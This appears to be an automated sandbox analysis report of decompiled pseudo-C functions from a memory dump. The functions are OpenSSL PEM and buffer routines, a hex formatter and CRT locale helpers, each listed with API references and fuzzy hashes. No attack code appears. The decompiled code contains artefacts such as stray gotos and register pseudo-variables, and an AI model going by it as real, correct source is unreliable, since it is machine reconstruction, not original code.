                                                              			E00BAA830(void* __ebx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				char* _t12;
                                                              				signed int _t16;
                                                              				intOrPtr* _t17;
                                                              				void* _t18;
                                                              				char* _t21;
                                                              				intOrPtr* _t22;
                                                              				intOrPtr _t24;
                                                              				void* _t28;
                                                              				char* _t32;
                                                              				intOrPtr _t33;
                                                              				void* _t34;
                                                              				void* _t35;
                                                              				void* _t37;
                                                              				intOrPtr* _t38;
                                                              				intOrPtr* _t39;
                                                              				signed int _t42;
                                                              				intOrPtr _t43;
                                                              				char* _t45;
                                                              				void* _t47;
                                                              				void* _t48;
                                                              
                                                              				_t28 = __ebx;
                                                              				_t38 = _a16;
                                                              				if(_t38 == 0) {
                                                              					_t45 = E00BBFFC0();
                                                              					__eflags = _t45;
                                                              					if(_t45 == 0) {
                                                              						_t45 = "Enter PEM pass phrase:";
                                                              					}
                                                              					_t39 = _a4;
                                                              					_t29 = _a12;
                                                              					asm("sbb esi, esi");
                                                              					_t42 =  ~_a12 & 0x00000004;
                                                              					_t12 = E00BBFFE0(_a12, _t34, _t45, _t39, _t42, _a8, _t45, _t29, _t28);
                                                              					_t48 = _t47 + 0x14;
                                                              					__eflags = _t12;
                                                              					if(_t12 != 0) {
                                                              						L14:
                                                              						E00B98310(_t39, 9, 0x64, 0x6d, "crypto\\pem\\pem_lib.c", 0x40);
                                                              						_t16 = E00C6BB40(_t39, _t39, 0, _a8) | 0xffffffff;
                                                              						__eflags = _t16;
                                                              					} else {
                                                              						do {
                                                              							_t17 = _t39;
                                                              							_t35 = _t17 + 1;
                                                              							do {
                                                              								_t32 =  *_t17;
                                                              								_t17 = _t17 + 1;
                                                              								__eflags = _t32;
                                                              							} while (_t32 != 0);
                                                              							_t16 = _t17 - _t35;
                                                              							__eflags = _t42;
                                                              							if(_t42 != 0) {
                                                              								__eflags = _t16 - _t42;
                                                              								if(__eflags < 0) {
                                                              									goto L13;
                                                              								}
                                                              							}
                                                              							goto L15;
                                                              							L13:
                                                              							_push(_t42);
                                                              							_push("phrase is too short, needs to be at least %d chars\n");
                                                              							_t18 = E00C6A3E6();
                                                              							E00C6D963(_t29, _t35, _t39, _t42, __eflags);
                                                              							_t21 = E00BBFFE0(_t29, _a8, _t45, _t39, _t42, _a8, _t45, _t29, _t18 + 0x40);
                                                              							_t48 = _t48 + 0x20;
                                                              							__eflags = _t21;
                                                              						} while (_t21 == 0);
                                                              						goto L14;
                                                              					}
                                                              					L15:
                                                              					return _t16;
                                                              				} else {
                                                              					_t22 = _t38;
                                                              					_t2 = _t22 + 1; // 0xbac205
                                                              					_t37 = _t2;
                                                              					do {
                                                              						_t33 =  *_t22;
                                                              						_t22 = _t22 + 1;
                                                              					} while (_t33 != 0);
                                                              					_t43 = _t22 - _t37;
                                                              					_t24 = _a8;
                                                              					if(_t43 > _t24) {
                                                              						_t43 = _t24;
                                                              					}
                                                              					E00C6B7A0(_t28, _t38, _t43, _a4, _t38, _t43);
                                                              					return _t43;
                                                              				}
                                                              			}

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _fprintf_memset
                                                              • String ID: Enter PEM pass phrase:$crypto\pem\pem_lib.c$phrase is too short, needs to be at least %d chars
                                                              • API String ID: 3021507156-1387369059
                                                              • Opcode ID: 636c4e83fc9e89bd9294e7919453c51dbe8d497e44069634b00221cb3bd4c1e7
                                                              • Instruction ID: ccb9c0cf70dc39f24d177506cd69b1965642c3611cf9ad5ecd3f76fdc4a45586
                                                              • Opcode Fuzzy Hash: 636c4e83fc9e89bd9294e7919453c51dbe8d497e44069634b00221cb3bd4c1e7
                                                              • Instruction Fuzzy Hash: C9210872A082112BD230A52D5C85F7BB7DDDF86B64F094664F958E7241E755DC02C3F2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E00C7365F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t15;
                                                              				LONG* _t21;
                                                              				long _t23;
                                                              				void* _t29;
                                                              				void* _t31;
                                                              				LONG* _t33;
                                                              				void* _t34;
                                                              				void* _t35;
                                                              
                                                              				_t35 = __eflags;
                                                              				_t29 = __edx;
                                                              				_t25 = __ebx;
                                                              				_push(0xc);
                                                              				_push(0xcbfda8);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				_t31 = E00C74108(__ebx, _t35);
                                                              				_t15 =  *0xcc634c; // 0xfffffffe
                                                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                              					E00C6FD40(_t25, _t31, 0xd);
                                                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                              					_t33 =  *(_t31 + 0x68);
                                                              					 *(_t34 - 0x1c) = _t33;
                                                              					__eflags = _t33 -  *0xcc6250; // 0x2921600
                                                              					if(__eflags != 0) {
                                                              						__eflags = _t33;
                                                              						if(_t33 != 0) {
                                                              							_t23 = InterlockedDecrement(_t33);
                                                              							__eflags = _t23;
                                                              							if(_t23 == 0) {
                                                              								__eflags = _t33 - 0xcc5e28;
                                                              								if(__eflags != 0) {
                                                              									_push(_t33);
                                                              									E00C69CB2(_t25, _t29, _t31, _t33, __eflags);
                                                              								}
                                                              							}
                                                              						}
                                                              						_t21 =  *0xcc6250; // 0x2921600
                                                              						 *(_t31 + 0x68) = _t21;
                                                              						_t33 =  *0xcc6250; // 0x2921600
                                                              						 *(_t34 - 0x1c) = _t33;
                                                              						InterlockedIncrement(_t33);
                                                              					}
                                                              					 *(_t34 - 4) = 0xfffffffe;
                                                              					E00C736FA();
                                                              				} else {
                                                              					_t33 =  *(_t31 + 0x68);
                                                              				}
                                                              				if(_t33 == 0) {
                                                              					E00C6B253(_t29, 0x20);
                                                              				}
                                                              				return E00C7087D(_t33);
                                                              			}

                                                              APIs
                                                              • __getptd.LIBCMT ref: 00C7366B
                                                                • Part of subcall function 00C74108: __getptd_noexit.LIBCMT ref: 00C7410B
                                                                • Part of subcall function 00C74108: __amsg_exit.LIBCMT ref: 00C74118
                                                              • __amsg_exit.LIBCMT ref: 00C7368B
                                                              • __lock.LIBCMT ref: 00C7369B
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00C736B8
                                                              • InterlockedIncrement.KERNEL32(02921600), ref: 00C736E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                              • String ID:
                                                              • API String ID: 4271482742-0
                                                              • Opcode ID: a7ad91d75c609496043dab45131ed0557868d40a8bc1f136563e242236ad7740
                                                              • Instruction ID: 4daa25dda84863e99945e0dceb4c05ef2b660ab3f591dae625598885d015be10
                                                              • Opcode Fuzzy Hash: a7ad91d75c609496043dab45131ed0557868d40a8bc1f136563e242236ad7740
                                                              • Instruction Fuzzy Hash: 8501DE72A00711FBCB21AB79D84AB5DB7A0BF44720F14800DF828A7390CB34AB41EBC5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E00BA8040(intOrPtr __ecx, intOrPtr __edx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t106;
                                                              				signed int _t110;
                                                              				signed int _t111;
                                                              				char* _t112;
                                                              				signed char _t114;
                                                              				void* _t120;
                                                              				void* _t123;
                                                              				void* _t125;
                                                              				signed int _t127;
                                                              				void* _t128;
                                                              				char* _t130;
                                                              				void* _t131;
                                                              				void* _t132;
                                                              				signed int _t134;
                                                              				intOrPtr _t137;
                                                              				signed int _t139;
                                                              				intOrPtr _t140;
                                                              				intOrPtr _t142;
                                                              				signed int _t149;
                                                              				char _t151;
                                                              				signed int _t155;
                                                              				char _t160;
                                                              				signed int _t163;
                                                              				signed char _t165;
                                                              				signed int _t166;
                                                              				char* _t169;
                                                              				signed int _t174;
                                                              				intOrPtr _t176;
                                                              				intOrPtr _t177;
                                                              				intOrPtr _t179;
                                                              				signed int _t187;
                                                              				char* _t188;
                                                              				signed int _t189;
                                                              				intOrPtr _t190;
                                                              				intOrPtr _t192;
                                                              				signed int _t198;
                                                              				signed int _t201;
                                                              				signed int _t204;
                                                              				void* _t209;
                                                              
                                                              				E00C6BB10(0x44);
                                                              				_t106 =  *0xcc5970; // 0x851ab4dd
                                                              				 *(_t204 + 0x40) = _t106 ^ _t204;
                                                              				_push(_t137);
                                                              				_t201 = 0;
                                                              				 *((intOrPtr*)(_t204 + 0x18)) =  *((intOrPtr*)(_t204 + 0x48));
                                                              				 *((intOrPtr*)(_t204 + 0x18)) = __ecx;
                                                              				 *((intOrPtr*)(_t204 + 0x14)) = __edx;
                                                              				 *(_t204 + 0x24) =  *(_t204 + 0x54);
                                                              				 *((intOrPtr*)(_t204 + 0x30)) = 0;
                                                              				 *(_t204 + 0x1c) = 0xc81291;
                                                              				 *(_t204 + 0x10) = 0;
                                                              				if( *(_t204 + 0x68) < 0) {
                                                              					 *((intOrPtr*)(_t204 + 0x70)) = 0;
                                                              				}
                                                              				_t165 =  *((intOrPtr*)(_t204 + 0x74));
                                                              				_t174 =  *(_t204 + 0x60);
                                                              				_t187 =  *(_t204 + 0x64);
                                                              				_t110 = _t174;
                                                              				_t149 = _t187;
                                                              				if((_t165 & 0x00000040) == 0) {
                                                              					_t209 = _t187 - _t201;
                                                              					if(_t209 > 0 || _t209 >= 0 && _t174 >= _t201) {
                                                              						if((_t165 & 0x00000002) == 0) {
                                                              							if((_t165 & 0x00000004) != 0) {
                                                              								 *((intOrPtr*)(_t204 + 0x30)) = 0x20;
                                                              							}
                                                              						} else {
                                                              							 *((intOrPtr*)(_t204 + 0x30)) = 0x2b;
                                                              						}
                                                              					} else {
                                                              						asm("adc esi, ebp");
                                                              						 *((intOrPtr*)(_t204 + 0x30)) = 0x2d;
                                                              						_t110 =  ~_t174;
                                                              						_t149 =  ~_t187;
                                                              					}
                                                              				}
                                                              				if((_t165 & 0x00000008) != 0) {
                                                              					_t198 =  *(_t204 + 0x68);
                                                              					if(_t198 != 8) {
                                                              						if(_t198 == 0x10) {
                                                              							 *(_t204 + 0x1c) = "0x";
                                                              						}
                                                              					} else {
                                                              						 *(_t204 + 0x1c) = "0";
                                                              					}
                                                              				}
                                                              				if((_t165 & 0x00000020) != 0) {
                                                              					 *(_t204 + 0x10) = 1;
                                                              				}
                                                              				goto L19;
                                                              				do {
                                                              					L28:
                                                              					_t151 =  *_t112;
                                                              					_t112 =  &(_t112[1]);
                                                              				} while (_t151 != 0);
                                                              				_t176 =  *((intOrPtr*)(_t204 + 0x30));
                                                              				_t155 =  *((intOrPtr*)(_t204 + 0x6c)) - (0 | _t176 != 0x00000000) - _t112 - _t169 - _t189;
                                                              				_t172 = 0;
                                                              				 *(_t204 + 0x28) = _t155;
                                                              				if(_t139 < 0) {
                                                              					 *(_t204 + 0x10) = 0;
                                                              				}
                                                              				if(_t155 < _t172) {
                                                              					 *(_t204 + 0x28) = _t172;
                                                              				}
                                                              				_t114 =  *((intOrPtr*)(_t204 + 0x74));
                                                              				if((_t114 & 0x00000010) != 0) {
                                                              					_t163 =  *(_t204 + 0x28);
                                                              					if( *(_t204 + 0x10) < _t163) {
                                                              						 *(_t204 + 0x10) = _t163;
                                                              					}
                                                              					 *(_t204 + 0x28) = _t172;
                                                              				}
                                                              				if((_t114 & 0x00000001) != 0) {
                                                              					 *(_t204 + 0x28) =  ~( *(_t204 + 0x28));
                                                              				}
                                                              				if( *(_t204 + 0x28) <= _t172) {
                                                              					L43:
                                                              					if(_t176 == 0) {
                                                              						L45:
                                                              						_t116 =  *( *(_t204 + 0x1c));
                                                              						if( *( *(_t204 + 0x1c)) == 0) {
                                                              							L49:
                                                              							if( *(_t204 + 0x10) <= 0) {
                                                              								L53:
                                                              								if(_t201 <= 0) {
                                                              									L56:
                                                              									if( *(_t204 + 0x28) >= 0) {
                                                              										L60:
                                                              										_pop(_t177);
                                                              										_pop(_t190);
                                                              										_pop(_t140);
                                                              										return E00C69C26(1, _t140,  *(_t204 + 0x40) ^ _t204, _t172, _t177, _t190);
                                                              									} else {
                                                              										while(1) {
                                                              											_t120 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x20);
                                                              											_t204 = _t204 + 8;
                                                              											if(_t120 == 0) {
                                                              												goto L61;
                                                              											}
                                                              											_t100 = _t204 + 0x28;
                                                              											 *_t100 =  *(_t204 + 0x28) + 1;
                                                              											if( *_t100 < 0) {
                                                              												continue;
                                                              											} else {
                                                              												goto L60;
                                                              											}
                                                              											goto L62;
                                                              										}
                                                              										goto L61;
                                                              									}
                                                              								} else {
                                                              									while(1) {
                                                              										_t160 =  *((char*)(_t204 + _t201 + 0x33));
                                                              										_t172 =  *(_t204 + 0x24);
                                                              										_t201 = _t201 - 1;
                                                              										_t123 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t160);
                                                              										_t204 = _t204 + 8;
                                                              										if(_t123 == 0) {
                                                              											goto L61;
                                                              										}
                                                              										if(_t201 > 0) {
                                                              											continue;
                                                              										} else {
                                                              											goto L56;
                                                              										}
                                                              										goto L62;
                                                              									}
                                                              									goto L61;
                                                              								}
                                                              							} else {
                                                              								while(1) {
                                                              									_t125 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x30);
                                                              									_t204 = _t204 + 8;
                                                              									if(_t125 == 0) {
                                                              										goto L61;
                                                              									}
                                                              									_t127 =  *(_t204 + 0x10) - 1;
                                                              									 *(_t204 + 0x10) = _t127;
                                                              									if(_t127 > 0) {
                                                              										continue;
                                                              									} else {
                                                              										goto L53;
                                                              									}
                                                              									goto L62;
                                                              								}
                                                              								goto L61;
                                                              							}
                                                              						} else {
                                                              							while(1) {
                                                              								_t172 =  *(_t204 + 0x24);
                                                              								_t128 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t116);
                                                              								_t204 = _t204 + 8;
                                                              								if(_t128 == 0) {
                                                              									goto L61;
                                                              								}
                                                              								_t130 =  &(( *(_t204 + 0x1c))[1]);
                                                              								 *(_t204 + 0x1c) = _t130;
                                                              								_t116 =  *_t130;
                                                              								if( *_t130 != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L49;
                                                              								}
                                                              								goto L62;
                                                              							}
                                                              							goto L61;
                                                              						}
                                                              					} else {
                                                              						_t172 =  *(_t204 + 0x24);
                                                              						_t131 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *(_t204 + 0x1c),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t176);
                                                              						_t204 = _t204 + 8;
                                                              						if(_t131 == 0) {
                                                              							goto L61;
                                                              						} else {
                                                              							goto L45;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					while(1) {
                                                              						_t132 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x20);
                                                              						_t204 = _t204 + 8;
                                                              						if(_t132 == 0) {
                                                              							break;
                                                              						}
                                                              						_t134 =  *(_t204 + 0x28) - 1;
                                                              						 *(_t204 + 0x28) = _t134;
                                                              						if(_t134 > 0) {
                                                              							continue;
                                                              						} else {
                                                              							_t176 =  *((intOrPtr*)(_t204 + 0x30));
                                                              							goto L43;
                                                              						}
                                                              						goto L62;
                                                              					}
                                                              					L61:
                                                              					_pop(_t179);
                                                              					_pop(_t192);
                                                              					_pop(_t142);
                                                              					return E00C69C26(0, _t142,  *(_t204 + 0x50) ^ _t204, _t172, _t179, _t192);
                                                              				}
                                                              				L62:
                                                              				L19:
                                                              				_t188 = "0123456789ABCDEF";
                                                              				if( *(_t204 + 0x10) == 0) {
                                                              					_t188 = "0123456789abcdef";
                                                              				}
                                                              				_t166 =  *(_t204 + 0x68);
                                                              				_t110 = E00C6CDA0(_t110, _t149, _t166, 0);
                                                              				 *((char*)(_t204 + _t201 + 0x34)) = _t188[_t149];
                                                              				_t149 = _t166;
                                                              				_t201 = _t201 + 1;
                                                              				 *((intOrPtr*)(_t204 + 0x2c)) = _t137;
                                                              				if((_t110 | _t149) == 0 || _t201 >= 0x1a) {
                                                              					if(_t201 == 0x1a) {
                                                              						_t201 = 0x19;
                                                              					}
                                                              					_t111 =  *((intOrPtr*)(_t204 + 0x70));
                                                              					_t139 = _t111 - _t201;
                                                              					 *((char*)(_t204 + _t201 + 0x34)) = 0;
                                                              					 *(_t204 + 0x10) = _t139;
                                                              					_t189 = _t111;
                                                              					if(_t111 < _t201) {
                                                              						_t189 = _t201;
                                                              					}
                                                              					_t112 =  *(_t204 + 0x1c);
                                                              					_t44 =  &(_t112[1]); // 0xc81292
                                                              					_t169 = _t44;
                                                              				} else {
                                                              					goto L19;
                                                              				}
                                                              				goto L28;
                                                              			}













































                                                              0x00ba811a
                                                              0x00ba811c
                                                              0x00ba811c
                                                              0x00ba8121
                                                              0x00ba8129
                                                              0x00ba8131
                                                              0x00ba8135
                                                              0x00ba8139
                                                              0x00ba813c
                                                              0x00ba8140
                                                              0x00ba814a
                                                              0x00ba814c
                                                              0x00ba814c
                                                              0x00ba8151
                                                              0x00ba8157
                                                              0x00ba815b
                                                              0x00ba8160
                                                              0x00ba8164
                                                              0x00ba8166
                                                              0x00ba8168
                                                              0x00ba8168
                                                              0x00ba816a
                                                              0x00ba816e
                                                              0x00ba816e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: $0123456789ABCDEF$0123456789abcdef
                                                              • API String ID: 1302938615-30751140
                                                              • Opcode ID: fa85810dd121a693f2e038cc99439077161b6e057ebaabaff50dfc4503dabc04
                                                              • Instruction ID: e599e50535c71ddeb5409a729784d59a3b286d665ab5d4b484b4070a8a56f454
                                                              • Opcode Fuzzy Hash: fa85810dd121a693f2e038cc99439077161b6e057ebaabaff50dfc4503dabc04
                                                              • Instruction Fuzzy Hash: E6917CB5A0C3418BDB14DE19D88562BB7E1EFCA754F1809ADF884A7701DB31EC498B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00BA99A0(void* __ebp, intOrPtr* _a4, intOrPtr _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t37;
                                                              				intOrPtr* _t53;
                                                              				intOrPtr _t54;
                                                              
                                                              				_t54 = _a8;
                                                              				_t53 = _a4;
                                                              				_t17 =  *_t53;
                                                              				if( *_t53 < _t54) {
                                                              					_t4 = _t53 + 8; // 0x44030447
                                                              					_t40 =  *_t4;
                                                              					if( *_t4 < _t54) {
                                                              						if(_t54 <= 0x5ffffffc) {
                                                              							_t6 = _t54 + 3; // 0xbab267
                                                              							_t37 = (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1);
                                                              							if(( *(_t53 + 0xc) & 0x00000001) == 0) {
                                                              								_t14 = _t53 + 4; // 0x8b4b74c0
                                                              								_t21 = E00BA35B0(_t53, __ebp,  *_t14, _t40, _t37, "crypto\\buffer\\buffer.c", 0x86);
                                                              							} else {
                                                              								_t21 = E00BA9870(_t37, _t53, _t37);
                                                              							}
                                                              							if(_t21 != 0) {
                                                              								 *((intOrPtr*)(_t53 + 4)) = _t21;
                                                              								 *((intOrPtr*)(_t53 + 8)) = _t37;
                                                              								E00C6BB40(_t53,  *_t53 + _t21, 0, _t54 -  *_t53);
                                                              								 *_t53 = _t54;
                                                              								return _t54;
                                                              							} else {
                                                              								E00B98310(_t53, 7, 0x69, 0x41, "crypto\\buffer\\buffer.c", 0x88);
                                                              								return 0;
                                                              							}
                                                              						} else {
                                                              							E00B98310(_t53, 7, 0x69, 0x41, "crypto\\buffer\\buffer.c", 0x7f);
                                                              							return 0;
                                                              						}
                                                              					} else {
                                                              						_t5 = _t53 + 4; // 0x8b4b74c0
                                                              						E00C6BB40(_t53,  *_t5 + _t17, 0, _t54 - _t17);
                                                              						 *_t53 = _t54;
                                                              						return _t54;
                                                              					}
                                                              				} else {
                                                              					_t3 = _t53 + 4; // 0x8b4b74c0
                                                              					_t45 =  *_t3;
                                                              					if( *_t3 != 0) {
                                                              						E00C6BB40(_t53, _t45 + _t54, 0, _t17 - _t54);
                                                              					}
                                                              					 *_t53 = _t54;
                                                              					return _t54;
                                                              				}
                                                              			}










                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\buffer\buffer.c
                                                              • API String ID: 2102423945-2193715570
                                                              • Opcode ID: 6877865da874acf1a5763168aea1317bfe534e5a4a909616383b2cd2645e4588
                                                              • Instruction ID: ef872d8e56248ee44c077dbe61503d976af8af89fe348239c54f7d8884318f58
                                                              • Opcode Fuzzy Hash: 6877865da874acf1a5763168aea1317bfe534e5a4a909616383b2cd2645e4588
                                                              • Instruction Fuzzy Hash: 8E21F8B2B482113BD6106A68FC82B6AF3D9AB91F50F04857AF909D76C5D7B4AC5183D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2d00c539795133b09a84fb53836ee2d241d62ac91e872d3dcde50671a70f351
                                                              • Instruction ID: 149200db6513496b0b88af98da2e1158ee54170b5c40a92c190da0bde32672ee
                                                              • Opcode Fuzzy Hash: d2d00c539795133b09a84fb53836ee2d241d62ac91e872d3dcde50671a70f351
                                                              • Instruction Fuzzy Hash: DFD188B5604204AFD714DF68CCA5EBBB7EDEBC9300F548A5CF98587205E671EC058BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00C7AD24(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				char _v20;
                                                              				char _t43;
                                                              				char _t46;
                                                              				signed int _t53;
                                                              				signed int _t54;
                                                              				intOrPtr _t56;
                                                              				int _t57;
                                                              				int _t58;
                                                              				signed short* _t59;
                                                              				short* _t60;
                                                              				int _t65;
                                                              				char* _t73;
                                                              
                                                              				_t73 = _a8;
                                                              				if(_t73 == 0 || _a12 == 0) {
                                                              					L5:
                                                              					return 0;
                                                              				} else {
                                                              					if( *_t73 != 0) {
                                                              						E00C6AE5D( &_v20, __edi, _a16);
                                                              						_t43 = _v20;
                                                              						__eflags =  *(_t43 + 0x14);
                                                              						if( *(_t43 + 0x14) != 0) {
                                                              							_t46 = E00C747E8( *_t73 & 0x000000ff,  &_v20);
                                                              							__eflags = _t46;
                                                              							if(_t46 == 0) {
                                                              								__eflags = _a4;
                                                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                              								if(__eflags != 0) {
                                                              									L10:
                                                              									__eflags = _v8;
                                                              									if(_v8 != 0) {
                                                              										_t53 = _v12;
                                                              										_t11 = _t53 + 0x70;
                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                              										__eflags =  *_t11;
                                                              									}
                                                              									return 1;
                                                              								}
                                                              								L21:
                                                              								_t54 = E00C6D8C9(__eflags);
                                                              								 *_t54 = 0x2a;
                                                              								__eflags = _v8;
                                                              								if(_v8 != 0) {
                                                              									_t54 = _v12;
                                                              									_t33 = _t54 + 0x70;
                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                              									__eflags =  *_t33;
                                                              								}
                                                              								return _t54 | 0xffffffff;
                                                              							}
                                                              							_t56 = _v20;
                                                              							_t65 =  *(_t56 + 0xac);
                                                              							__eflags = _t65 - 1;
                                                              							if(_t65 <= 1) {
                                                              								L17:
                                                              								__eflags = _a12 -  *(_t56 + 0xac);
                                                              								if(__eflags < 0) {
                                                              									goto L21;
                                                              								}
                                                              								__eflags = _t73[1];
                                                              								if(__eflags == 0) {
                                                              									goto L21;
                                                              								}
                                                              								L19:
                                                              								_t57 =  *(_t56 + 0xac);
                                                              								__eflags = _v8;
                                                              								if(_v8 == 0) {
                                                              									return _t57;
                                                              								}
                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                              								return _t57;
                                                              							}
                                                              							__eflags = _a12 - _t65;
                                                              							if(_a12 < _t65) {
                                                              								goto L17;
                                                              							}
                                                              							__eflags = _a4;
                                                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                              							__eflags = _t58;
                                                              							_t56 = _v20;
                                                              							if(_t58 != 0) {
                                                              								goto L19;
                                                              							}
                                                              							goto L17;
                                                              						}
                                                              						_t59 = _a4;
                                                              						__eflags = _t59;
                                                              						if(_t59 != 0) {
                                                              							 *_t59 =  *_t73 & 0x000000ff;
                                                              						}
                                                              						goto L10;
                                                              					} else {
                                                              						_t60 = _a4;
                                                              						if(_t60 != 0) {
                                                              							 *_t60 = 0;
                                                              						}
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              			}


















                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7AD58
                                                              • __isleadbyte_l.LIBCMT ref: 00C7AD8C
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 00C7ADBD
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 00C7AE2B
                                                              Memory Dump Source
